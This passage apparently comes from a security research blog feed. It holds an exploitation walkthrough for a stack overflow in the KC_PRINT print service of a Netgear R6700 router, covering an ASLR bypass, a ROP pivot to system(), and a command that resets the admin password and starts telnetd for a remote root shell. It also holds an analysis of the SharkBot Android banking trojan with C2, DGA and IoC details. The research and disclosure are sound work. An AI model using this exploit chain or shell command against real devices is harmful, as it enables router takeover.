        suffix_data[suffix_offset++] = 0x44;

        // we can set a copy_len == 0 to simplify this
        // offset = 9 here
        copy_len = (recv_buf[offset + 1] << 8) + recv_buf[offset + 2];
        copied_len = memcpy_at_index(suffix_data, suffix_offset, &recv_buf[offset + 1], copy_len + 2);
        suffix_offset += copied_len;
      }
      ++offset;                                 // iteration 1: offset = 10 after this


      // this is the same copy_len as above but just used to skip bytes here
      // offset = 10 here
      copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];
      offset += 2 + copy_len;                   // we can set a copy_len == 0 to simplify this
                                                // iteration 1: offset = 12 after this

      // again, copy_len is pulled from client controlled data,
      // this time used in a copy onto a stack buffer
      // copy_len equals maximum: 0xff00 + 0xff
      // and a copy is made into command[] which is a 2048-byte buffer
      copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];
      offset += 2;                              // iteration 1: offset = 14 after this

      // we need flag2 == 1 to enter this
      if ( flag2 )
      {
        // /!\ VULNERABILITY HERE /!\
        memset(command, 0, sizeof(command));
        memcpy(command, &recv_buf[offset], copy_len);// VULN: stack overflow here
        ...

It first starts by allocating a prefix_ptr heap buffer to hold a few bytes from the client data. Depending on client data bytes 0 and 1, it may set bReadAllJobs = 1 which we want to avoid in order to reach the vulnerable memcpy(), so we make sure bReadAllJobs = 0 remains.

Above we see 2 memset() for 2 stack buffers that we named job_data and suffix_data. We then enter the if ( !bReadAllJobs ). We craft client data to we make sure to validate the while ( recv_buf[offset] != 3 && offset <= content_len ) condition to enter the loop.

We also need to set flag2 = 1 so we make sure to validate the conditions on the client data to enter the if ( recv_buf[offset] == 0x44 && !flag2 ) condition.

Later inside the while loop if flag2 is set, then a 16-bit size (maximum is 0xffff = 65535 bytes) is read from the client data in copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];. Then, this size is used as the argument to memcpy when copying into a 64-byte stack buffer in memcpy(command, &recv_buf[offset], copy_len). This is a stack-based overflow vulnerability where we control the overflowing size and content. There is no limitation on the values of the bytes to use for overflowing, which makes it a very nice vulnerability to exploit at first sight.

Since there is no stack cookie, the strategy to exploit this stack overflow is to overwrite the saved return address on the stack and continue execution until the end of the function to get $pc control.

Reaching the end of the function

It is now important to look at the stack layout from the command[] array we are overflowing from. As can be seen below, command[] is the local variable that is furthest away from the return address. This has the advantage of allowing us to control any of the local variable’s values post-overflow. Remember that we are in the while loop at the moment so the initial idea would be to get out of this loop as soon as possible. By overwriting local variables and setting them to appropriate values, this should be easy.

-00001090 command         DCB 64 dup(?)
-00001050 suffix_data     DCB 2048 dup(?)
-00000850 job_data        DCB 2048 dup(?)
-00000050 error           DCD ?
-0000004C copy_len        DCD ?
-00000048 copy_len_1      DCD ?
-00000044 copied_len      DCD ?
-00000040 prefix_size     DCD ?
-0000003C in_offset       DCD ?
-00000038 prefix_ptr      DCD ?                   ; offset
-00000034 usblp_index     DCD ?
-00000030 client_sock     DCD ?
-0000002C kc_client_1     DCD ?
-00000028 offset_job      DCD ?
-00000024                 DCB ? ; undefined
-00000023                 DCB ? ; undefined
-00000022                 DCB ? ; undefined
-00000021 bReadAllJobs    DCB ?
-00000020 is_job_media_sheets_completed DCB ?
-0000001F is_job_state_reasons DCB ?
-0000001E is_job_state    DCB ?
-0000001D is_job_originating_user_name DCB ?
-0000001C is_job_name     DCB ?
-0000001B is_job_id       DCB ?
-0000001A suffix_copy1_done DCB ?
-00000019 flag2           DCB ?
-00000018 final_size      DCD ?
-00000014 offset          DCD ?
-00000010 response_len    DCD ?
-0000000C final_ptr       DCD ?                   ; offset
-00000008 suffix_offset   DCD ?

So after our overflowing memcpy(), we decide to set client data to hold the "job-id" command to simplify code paths being taken. Then we see the offset += copy_len statement. Since we control both copy_len and offset values due to our overflow, we can craft values to make us exit from the loop condition: while ( recv_buf[offset] != 3 && offset <= content_len ) by setting offset = content_len+1 for instance.

Next we are executing the 2nd read_job_value() call due to bReadAllJobs == 0. The read_job_value() is not relevant for us but its purpose is to loop on all the printer’s jobs and save the requested data (in our case it would be the job-id). In our case, we assume there is no printer’s job at the moment so nothing will be read. This means the offset_job being returned is 0.

  // we need to enter this to trigger the stack overflow
  if ( !bReadAllJobs )
  {
    // iteration 1: offset == 9
    // NOTE: we make sure to overwrite the "offset" local variable
    // to be content_len+1 when overflowing the stack buffer to exit this loop after the 1st iteration
    while ( recv_buf[offset] != 3 && offset <= content_len )
    {
      ...
      // we need flag2 == 1 to enter this
      if ( flag2 )
      {
        // /!\ VULNERABILITY HERE /!\
        memset(command, 0, sizeof(command));
        memcpy(command, &recv_buf[offset], copy_len);// VULN: stack overflow here

        // dispatch to right command 
        if ( !strcmp(command, "job-media-sheets-completed") )
        {
          is_job_media_sheets_completed = 1;
        }
        ...
        else if ( !strcmp(command, "job-id") )
        {
          // atm we make sure to send a "job-id\0" command to go here
          is_job_id = 1;
        }
        else
        {
          ...
        }
      }
      offset += copy_len;                       // this is executed before looping
    }
  }                                             // end of while loop

  final_size += prefix_size;
  if ( bReadAllJobs )
    offset_job = read_job_value(usblp_index, 1, 1, 1, 1, 1, 1, job_data);
  else
    offset_job = read_job_value(
                   usblp_index,
                   is_job_id,
                   is_job_name,
                   is_job_originating_user_name,
                   is_job_state,
                   is_job_state_reasons,
                   is_job_media_sheets_completed,
                   job_data);

Now, we continue to look at the vulnerable function code below. Since offset_job = 0, the first if clause is skipped (Note: skipped for now as there is a label that we will jump to later, hence why we kept it in the code below).

Then, a heap buffer to hold a response is allocated and saved in final_ptr. Then, data is copied from the prefix_ptr buffer mentioned at the beginning of the vulnerable function. Finally, it jumps to the b_write_ipp_response2 label where write_ipp_response() at 0x13210 is called. write_ipp_response() won’t be shown for brevity but its purpose is to send an HTTP response to the client socket.

Finally, the 2 heap buffers pointed by prefix_ptr and final_ptr are freed and the function exits.

  // offset_job is an offset inside job_data[] stack buffer
  // atm we assume offset_job == 0 so we skip this condition.
  // Note we assume that due to no printing job currently existing
  // but it would be better to actually make sure all the is_xxx variables == 0 as explained above
  if ( offset_job > 0 )                         // assumed skipped for now
  {
    ...
b_write_ipp_response2:
    final_ptr[response_len++] = 3;
    // the "client_sock" is a local variable that we overwrite
    // when trying to reach the stack address. We need to brute
    // force the socket value in order to effectively send
    // us our leaked data if we really want that data back but
    // otherwise the send() will silently fail
    error = write_ipp_response(client_sock, final_ptr, response_len);

    // From testing, it is safe to use the starting .got address for the prefix_ptr 
    // and free() will ignore that address hehe
    // XXX - not sure why but if I use memset_ptr (offset inside
    //       the .got), it crashes on free() though lol
    if ( prefix_ptr )
    {
      free(prefix_ptr);
      prefix_ptr = 0;
    }

    // Freeing the final_ptr is no problem for us
    if ( final_ptr )
    {
      free(final_ptr);
      final_ptr = 0;
    }

    // this is where we get $pc control
    if ( error )
      return 0xFFFFFFFF;
    else
      return 0;
  }

  // we reach here if no job data
  final_ptr = (char *)malloc(++final_size);
  if ( final_ptr )
  {
    // prefix_ptr is a heap buffer that was allocated at the
    // beginning of this function but pointer is stored in a
    // stack variable. We actually need to corrupt this pointer
    // as part of the stack overflow to reach the return address
    // which means we can leak make it copy any size from any
    // address which results in our leak primitive
    memset(final_ptr, 0, final_size);
    copied_len = memcpy_at_index(final_ptr, response_len, prefix_ptr, prefix_size);
    response_len += copied_len;
    goto b_write_ipp_response2;
  }

  // error below / never reached
  ...
}

Exploitation

Mitigations in place

Our goal is to overwrite the return address to get $pc control but there are a few challenges here. We need to know what static addresses we can use.

Checking the ASLR settings of the kernel:

# cat /proc/sys/kernel/randomize_va_space
1

From here:

  • 0 – Disable ASLR. This setting is applied if the kernel is booted with the norandmaps boot parameter.
  • 1 – Randomize the positions of the stack, virtual dynamic shared object (VDSO) page, and shared memory regions. The base address of the data segment is located immediately after the end of the executable code segment.
  • 2 – Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment. This is the default setting.

Checking the mitigations of the KC_PRINT binary using checksec.py:

[*] '/home/cedric/test/firmware/netgear_r6700/_R6700v3-
V1.0.4.118_10.0.90.zip.extracted/
_R6700v3-V1.0.4.118_10.0.90.chk.extracted/squashfs-root/usr/bin/KC_PRINT'
    Arch:     arm-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8000)

So to summarize:

  • KC_PRINT: not randomized
    • .text: read/execute
    • .data: read/write
  • Libraries: randomized
  • Heap: not randomized
  • Stack: randomized

Building a leak primitive

If we go back to the previous decompiled code we discussed, there are a few things to point out:

final_ptr = (char *)malloc(++final_size);
copied_len = memcpy_at_index(final_ptr, response_len, prefix_ptr, prefix_size);
error = write_ipp_response(client_sock, final_ptr, response_len);

The first one is that in order to overwrite the return address we first need to overwrite prefix_ptr, prefix_size and client_sock.

prefix_ptr needs to be a valid address and this address will be used to copy prefix_size bytes from it into final_ptr. Then that data will be sent back to the client socket assuming client_sock is a valid socket.

This looks like a good leak primitive since we control both prefix_ptr and prefix_size, however we still need to know our previously valid client_sock to get the data back.

However, what if we overwrite the whole stack frame containing all the local variables except we don’t overwrite the saved registers and the return address? Well it will proceed to send us data back and will exit the function as if no overflow happened. This is perfect as it allows us to brute force the client_sock value.

Moreover, by testing multiple times, we noticed that if we are the only client connecting to KC_PRINT the client_sock could be different among KC_PRINT executions. However, once KC_PRINT is started, it will keep allocating the same client_sock for every connection as long as we closed the previous connection.

This is a perfect scenario for us since it means we can initially bruteforce the socket value by overflowing the entire stack frame (except the saved register and return value) until we get an HTTP response, and KC_PRINT will never crashes. Once we know that socket value, we can start leaking data. But where to point prefix_ptr to?

Bypassing ASLR and achieving command execution

Here, there is another challenge to solve. Indeed, at the end of Response_Get_Jobs there is a call to free(prefix_ptr); before we can control $pc. So initially we thought we would need to know a valid heap address that is valid for free().

However after testing in the debugger, we noticed that passing the Global Offset Table (GOT) address to the free() call went through without crashing. We are not sure why as we didn’t investigate for time reasons. However, this opens new opportunities. Indeed, the .got is at a static address due to KC_PRINT being compiled without PIE support. It means we can leak an imported function like memset() which is in libc.so. Then we can deduce the libc.so base address and effectively bypass the ASLR in place for libraries. We can then deduce the system() address.

Our end goal is to call system() on an arbitrary string to execute a shell command. But where to store our data? Initially we thought we could use the data on the stack but the stack is randomized so we can’t hardcode an address in our data. We could use a complicated ROP chain to build the command string to execute, but it seemed over-complicated to do in ARM (32-bit) due to ARM 32-bit alignment of instructions which makes using non-aligned instructions impossible. We also thought about changing the ARM mode to Thumb mode. But is there an even easier method?

What if we could allocate controlled data at a specific address? Then we remembered the excellent blog from Project Zero which mentioned mmap() randomization was broken on 32-bit. And in our case, we know the heap is not randomized, so what about big allocations? It turns out they are randomized but not so well.

Remember we mentioned earlier in this blog post that we can send an HTTP content as big as we want and a heap buffer of that size will be allocated? Now we have a use for it. By sending an HTTP content of e.g. 0x1000000 (16MB), we noticed it gets allocated outside of the [heap] region and above the libraries. More specifically we noticed by testing that an address in the range 0x401xxxxx-0x403xxxxx will always be used.

# cat /proc/317/maps
00008000-00018000 r-xp 00000000 1f:03 1429       /usr/bin/KC_PRINT          // static
00018000-00019000 rw-p 00010000 1f:03 1429       /usr/bin/KC_PRINT          // static
00019000-0001c000 rw-p 00000000 00:00 0          [heap]                     // static
4001e000-40023000 r-xp 00000000 1f:03 376        /lib/ld-uClibc.so.0        // ASLR
4002a000-4002b000 r--p 00004000 1f:03 376        /lib/ld-uClibc.so.0
4002b000-4002c000 rw-p 00005000 1f:03 376        /lib/ld-uClibc.so.0
4002f000-40030000 rw-p 00000000 00:00 0
40154000-4015f000 r-xp 00000000 1f:03 265        /lib/libpthread.so.0       // ASLR
4015f000-40166000 ---p 00000000 00:00 0
40166000-40167000 r--p 0000a000 1f:03 265        /lib/libpthread.so.0
40167000-4016c000 rw-p 0000b000 1f:03 265        /lib/libpthread.so.0
4016c000-4016e000 rw-p 00000000 00:00 0
4016e000-401d3000 r-xp 00000000 1f:03 352        /lib/libc.so.0             // ASLR
401d3000-401db000 ---p 00000000 00:00 0
401db000-401dc000 r--p 00065000 1f:03 352        /lib/libc.so.0
401dc000-401dd000 rw-p 00066000 1f:03 352        /lib/libc.so.0
401dd000-401e2000 rw-p 00000000 00:00 0                                     // Broken ASLR
bcdfd000-bce00000 rwxp 00000000 00:00 0
bcffd000-bd000000 rwxp 00000000 00:00 0
bd1fd000-bd200000 rwxp 00000000 00:00 0
bd3fd000-bd400000 rwxp 00000000 00:00 0
bd5fd000-bd600000 rwxp 00000000 00:00 0
bd7fd000-bd800000 rwxp 00000000 00:00 0
bd9fd000-bda00000 rwxp 00000000 00:00 0
bdbfd000-bdc00000 rwxp 00000000 00:00 0
bddfd000-bde00000 rwxp 00000000 00:00 0
bdffd000-be000000 rwxp 00000000 00:00 0
be1fd000-be200000 rwxp 00000000 00:00 0
be3fd000-be400000 rwxp 00000000 00:00 0
beacc000-beaed000 rw-p 00000000 00:00 0          [stack]                    // ASLR

If it gets allocated in the lowest address 0x40100008, it will end at 0x41100008. It means we can spray pages of the same data and get deterministic content at a static address, e.g. 0x41000100.

Finally, looking at the Response_Get_Jobs function’s epilogue, we see POP {R11,PC} which means we can craft a fake R11 and use a gadget like the following to pivot our stack to a new stack where we have data we control to start doing Return Oriented Programming (ROP):

.text:000118A0                 LDR             R3, [R11,#-0x28]
.text:000118A4
.text:000118A4 loc_118A4                               ; Get_JobNode_Print_Job+7D8↑j
.text:000118A4                 MOV             R0, R3
.text:000118A8                 SUB             SP, R11, #4
.text:000118AC                 POP             {R11,PC}

So we can make R11 points to our static region 0x41000100 and also store the command to execute at a static address in that region. Then we use the above gadget to retrieve the address of that command (also stored in that region) in order to set the first argument of system() (in r0) and then pivot to a new stack to that region that will make it finally return to system("any command")

Obtaining a root shell

We decided to use the following command: "nvram set http_passwd=nccgroup && sleep 4 && utelnetd -d -i br0". This is very similar to the method that what was used in the Tokyo drift paper except that in our case we have more control since we are executing all the commands we want so we can set an arbitrary password as well as start the utelnetd process instead of just being able to reset the HTTP password to its default value.

Finally, we use the same trick as the Tokyo drift paper and login to the web interface to re-set the password to the same password, so utelnetd takes into account our new password and we get a remote shell on the Netgear router.

✇NCC Group Research

SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store

By: RIFT: Research and Intelligence Fusion Team

Authors:

  • Alberto Segura, Malware analyst
  • Rolf Govers, Malware analyst & Forensic IT Expert

NCC Group, as well as many other researchers noticed a rise in Android malware last year, especially Android banking malware. Within the Threat Intelligence team of NCC Group we’re looking closely to several of these malware families to provide valuable information to our customers about these threats. Next to the more popular Android banking malware NCC Group’s Threat Intelligence team also watches new trends and new families that arise and could be potential threats to our customers.

One of these ‘newer’ families is an Android banking malware called SharkBot. During our research we noticed that this malware was distributed via the official Google play store. After discovery we immediately notified Google and decided to share our knowledge via this blog post.

NCC Group’s Threat Intelligence team continues analysis of SharkBot and uncovering new findings. Shortly after we published this blogpost, we found several more SharkBot droppers in the Google Play Store. All appear to behave identically; in fact, the code seems to be a literal a ‘copy-paste’ in all of them. Also the same corresponding C2 server is used in all the other droppers. After discovery we immediately reported this to Google. See the IoCs section below for the Google Play Store URLs of the newly discovered SharkBot dropper apps.

Summary

SharkBot is an Android banking malware found at the end of October 2021 by the Cleafy Threat Intelligence Team. At the moment of writing the SharkBot malware doesn’t seem to have any relations with other Android banking malware like Flubot, Cerberus/Alien, Anatsa/Teabot, Oscorp, etc.

The Cleafy blogpost stated that the main goal of SharkBot is to initiate money transfers (from compromised devices) via Automatic Transfer Systems (ATS). As far as we observed, this technique is an advanced attack technique which isn’t used regularly within Android malware. It enables adversaries to auto-fill fields in legitimate mobile banking apps and initate money transfers, where other Android banking malware, like Anatsa/Teabot or Oscorp, require a live operator to insert and authorize money transfers. This technique also allows adversaries to scale up their operations with minimum effort.

The ATS features allow the malware to receive a list of events to be simulated, and them will be simulated in order to do the money transfers. Since this features can be used to simulate touches/clicks and button presses, it can be used to not only automatically transfer money but also install other malicious applications or components. This is the case of the SharkBot version that we found in the Google Play Store, which seems to be a reduced version of SharkBot with the minimum required features, such as ATS, to install a full version of the malware some time after the initial install.

Because of the fact of being distributed via the Google Play Store as a fake Antivirus, we found that they have to include the usage of infected devices in order to spread the malicious app. SharkBot achieves this by abusing the ‘Direct Reply‘ Android feature. This feature is used to automatically send reply notification with a message to download the fake Antivirus app. This spread strategy abusing the Direct Reply feature has been seen recently in another banking malware called Flubot, discovered by ThreatFabric.

What is interesting and different from the other families is that SharkBot likely uses ATS to also bypass multi-factor authentication mechanisms, including behavioral detection like bio-metrics, while at the same time it also includes more classic features to steal user’s credentials.

Money and Credential Stealing features

SharkBot implements the four main strategies to steal banking credentials in Android:

  • Injections (overlay attack): SharkBot can steal credentials by showing a WebView with a fake log in website (phishing) as soon as it detects the official banking app has been opened.
  • Keylogging: Sharkbot can steal credentials by logging accessibility events (related to text fields changes and buttons clicked) and sending these logs to the command and control server (C2).
  • SMS intercept: Sharkbot has the ability to intercept/hide SMS messages.
  • Remote control/ATS: Sharkbot has the ability to obtain full remote control of an Android device (via Accessibility Services).

For most of these features, SharkBot needs the victim to enable the Accessibility Permissions & Services. These permissions allows Android banking malware to intercept all the accessibility events produced by the interaction of the user with the User Interface, including button presses, touches, TextField changes (useful for the keylogging features), etc. The intercepted accessibility events also allow to detect the foreground application, so banking malware also use these permissions to detect when a targeted app is open, in order to show the web injections to steal user’s credentials.

Delivery

Sharkbot is distributed via the Google Play Store, but also using something relatively new in the Android malware: ‘Direct reply‘ feature for notifications. With this feature, the C2 can provide as message to the malware which will be used to automatically reply the incoming notifications received in the infected device. This has been recently introduced by Flubot to distribute the malware using the infected devices, but it seems SharkBot threat actors have also included this feature in recent versions.

In the following image we can see the code of SharkBot used to intercept new notifications and automatically reply them with the received message from the C2.

In the following picture we can see the ‘autoReply’ command received by our infected test device, which contains a shortten Bit.ly link which redirects to the Google Play Store sample.

We detected the SharkBot reduced version published in the Google Play on 28th February, but the last update was on 10th February, so the app has been published for some time now. This reduced version uses a very similar protocol to communicate with the C2 (RC4 to encrypt the payload and Public RSA key used to encrypt the RC4 key, so the C2 server can decrypt the request and encrypt the response using the same key). This SharkBot version, which we can call SharkBotDropper is mainly used to download a fully featured SharkBot from the C2 server, which will be installed by using the Automatic Transfer System (ATS) (simulating click and touches with the Accessibility permissions).

This malicious dropper is published in the Google Play Store as a fake Antivirus, which really has two main goals (and commands to receive from C2):

  • Spread the malware using ‘Auto reply’ feature: It can receive an ‘autoReply’ command with the message that should be used to automatically reply any notification received in the infected device. During our research, it has been spreading the same Google Play dropper via a shorten Bit.ly URL.
  • Dropper+ATS: The ATS features are used to install the downloaded SharkBot sample obtained from the C2. In the following image we can see the decrypted response received from the C2, in which the dropper receives the command ‘b‘ to download the full SharkBot sample from the provided URL and the ATS events to simulate in order to get the malware installed.

With this command, the app installed from the Google Play Store is able to install and enable Accessibility Permissions for the fully featured SharkBot sample it downloaded. It will be used to finally perform the ATS fraud to steal money and credentials from the victims.

The fake Antivirus app, the SharkBotDropper, published in the Google Play Store has more than 1,000 downloads, and some fake comments like ‘It works good’, but also other comments from victims that realized that this app does some weird things.

Technical analysis

Protocol & C2

The protocol used to communicate with the C2 servers is an HTTP based protocol. The HTTP requests are made in plain, since it doesn’t use HTTPs. Even so, the actual payload with the information sent and received is encrypted using RC4. The RC4 key used to encrypt the information is randomly generated for each request, and encrypted using the RSA Public Key hardcoded in each sample. That way, the C2 can decrypt the encrypted key (rkey field in the HTTP POST request) and finally decrypt the sent payload (rdata field in the HTTP POST request).

If we take a look at the decrypted payload, we can see how SharkBot is simply using JSON to send different information about the infected device and receive the commands to be executed from the C2. In the following image we can see the decrypted RC4 payload which has been sent from an infected device.

Two important fields sent in the requests are:

  • ownerID
  • botnetID

Those parameters are hardcoded and have the same value in the analyzed samples. We think those values can be used in the future to identify different buyers of this malware, which based on our investigation is not being sold in underground forums yet.

Domain Generation Algorithm

SharkBot includes one or two domains/URLs which should be registered and working, but in case the hardcoded C2 servers were taken down, it also includes a Domain Generation Algorithm (DGA) to be able to communicate with a new C2 server in the future.

The DGA uses the current date and a specific suffix string (‘pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf’) to finally encode that in base64 and get the first 19 characters. Then, it append different TLDs to generate the final candidate domain.

The date elements used are:

  • Week of the year (v1.get(3) in the code)
  • Year (v1.get(1) in the code)

It uses the ‘+’ operator, but since the week of the year and the year are Integers, they are added instead of appended, so for example: for the second week of 2022, the generated string to be base64 encoded is: 2 + 2022 + “pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf” = 2024 + “pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf” = “2024pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf”.

In previous versions of SharkBot (from November-December of 2021), it only used the current week of the year to generate the domain. Including the year to the generation algorithm seems to be an update for a better support of the new year 2022.

Commands

SharkBot can receive different commands from the C2 server in order to execute different actions in the infected device such as sending text messages, download files, show injections, etc. The list of commands it can receive and execute is as follows:

  • smsSend: used to send a text message to the specified phone number by the TAs
  • updateLib: used to request the malware downloads a new JAR file from the specified URL, which should contain an updated version of the malware
  • updateSQL: used to send the SQL query to be executed in the SQLite database which Sharkbot uses to save the configuration of the malware (injections, etc.)
  • stopAll: used to reset/stop the ATS feature, stopping the in progress automation.
  • updateConfig: used to send an updated config to the malware.
  • uninstallApp: used to uninstall the specified app from the infected device
  • changeSmsAdmin: used to change the SMS manager app
  • getDoze: used to check if the permissions to ignore battery optimization are enabled, and show the Android settings to disable them if they aren’t
  • sendInject: used to show an overlay to steal user’s credentials
  • getNotify: used to show the Notification Listener settings if they are not enabled for the malware. With this permissions enabled, Sharkbot will be able to intercept notifications and send them to the C2
  • APP_STOP_VIEW: used to close the specified app, so every time the user tries to open that app, the Accessibility Service with close it
  • downloadFile: used to download one file from the specified URL
  • updateTimeKnock: used to update the last request timestamp for the bot
  • localATS: used to enable ATS attacks. It includes a JSON array with the different events/actions it should simulate to perform ATS (button clicks, etc.)

Automatic Transfer System

One of the distinctive parts of SharkBot is that it uses a technique known as Automatic Transfer System (ATS). ATS is a relatively new technique used by banking malware for Android.

To summarize ATS can be compared with webinject, only serving a different purpose. Rather then gathering credentials for use/scale it uses the credentials for automatically initiating wire transfers on the endpoint itself (so without needing to log in and bypassing 2FA or other anti-fraud measures). However, it is very individually tailored and request quite some maintenance for each bank, amount, money mules etc. This is probably one of the reasons ATS isn’t that popular amongst (Android) banking malware.

How does it work?

Once a target logs into their banking app the malware would receive an array of events (clicks/touches, button presses, gestures, etc.) to be simulated in an specific order. Those events are used to simulate the interaction of the victim with the banking app to make money transfers, as if the user were doing the money transfer by himself.

This way, the money transfer is made from the device of the victim by simulating different events, which make much more difficult to detect the fraud by fraud detection systems.

IoCs

Sample Hashes:

  • a56dacc093823dc1d266d68ddfba04b2265e613dcc4b69f350873b485b9e1f1c (Google Play SharkBotDropper)
  • 9701bef2231ecd20d52f8fd2defa4374bffc35a721e4be4519bda8f5f353e27a (Dropped SharkBot v1.64.1)
  • 20e8688726e843e9119b33be88ef642cb646f1163dce4109b8b8a2c792b5f9fc (Google play SharkBot dropper)
  • 187b9f5de09d82d2afbad9e139600617685095c26c4304aaf67a440338e0a9b6 (Google play SharkBot dropper)
  • e5b96e80935ca83bbe895f6239eabca1337dc575a066bb6ae2b56faacd29dd (Google play SharkBot dropper)

SharkBotDropper C2:

  • hxxp://statscodicefiscale[.]xyz/stats/

‘Auto/Direct Reply’ URL used to distribute the malware:

  • hxxps://bit[.]ly/34ArUxI

Google Play Store URL:

C2 servers/Domains for SharkBot:

  • n3bvakjjouxir0zkzmd[.]xyz (185.219.221.99)
  • mjayoxbvakjjouxir0z[.]xyz (185.219.221.99)

RSA Public Key used to encrypt RC4 key in SharkBot:

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2R7nRj0JMouviqMisFYt0F2QnScoofoR7svCcjrQcTUe7tKKweDnSetdz1A+PLNtk7wKJk+SE3tcVB7KQS/WrdsEaE9CBVJ5YmDpqGaLK9qZhAprWuKdnFU8jZ8KjNh8fXyt8UlcO9ABgiGbuyuzXgyQVbzFfOfEqccSNlIBY3s+LtKkwb2k5GI938X/4SCX3v0r2CKlVU5ZLYYuOUzDLNl6KSToZIx5VSAB3VYp1xYurRLRPb2ncwmunb9sJUTnlwypmBCKcwTxhsFVAEvpz75opuMgv8ba9Hs0Q21PChxu98jNPsgIwUn3xmsMUl0rNgBC3MaPs8nSgcT4oUXaVwIDAQAB

RSA Public Key used to encrypt RC4 Key in the Google Play SharkBotDropper:

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9qo1QgM8FH7oAkCLkNO5XfQBUdl+pI4u2tvyFiZZ6hMZ07QnlYazgRmWcC5j5H2iV+74gQ9+1cgjnVSszGbIwVJOQAEZGRpSFT7BhAhA4+PTjH6CCkiyZTk7zURvgBCrXz6+B1XH0OcD4YUYs4OGj8Pd2KY6zVocmvcczkwiU1LEDXo3PxPbwOTpgJL+ySWUgnKcZIBffTiKZkry0xR8vD/d7dVHmZnhJS56UNefegm4aokHPmvzD9p9n3ez1ydzfLJARb5vg0gHcFZMjf6MhuAeihFMUfLLtddgo00Zs4wFay2mPYrpn2x2pYineZEzSvLXbnxuUnkFqNmMV4UJwIDAQAB
❌